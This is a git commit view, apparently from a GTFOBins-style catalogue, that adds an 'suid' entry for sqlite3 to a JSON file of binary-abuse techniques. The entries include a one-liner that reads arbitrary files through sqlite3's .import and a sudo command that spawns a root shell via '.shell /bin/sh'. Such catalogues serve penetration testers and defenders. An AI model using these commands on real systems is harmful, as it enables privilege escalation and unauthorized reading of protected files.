add suid functionality to sqlite3

master
Mr. Robot 3 years ago committed by GitHub
parent bab9479df1
commit 753d814773
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -15,6 +15,11 @@
"code": "sqlite3 << EOF\nCREATE TABLE t(line TEXT);\n.import [file] t\nSELECT * FROM t;\nEOF\n"
}
],
"suid": [
{
"code": "sqlite3 << EOF\nCREATE TABLE t(line TEXT);\n.import [file] t\nSELECT * FROM t;\nEOF"
}
],
"sudo": [
{
"code": "sudo sqlite3 /dev/null '.shell /bin/sh'"
@ -26,4 +31,4 @@
}
]
}
}
}

Loading…
Cancel
Save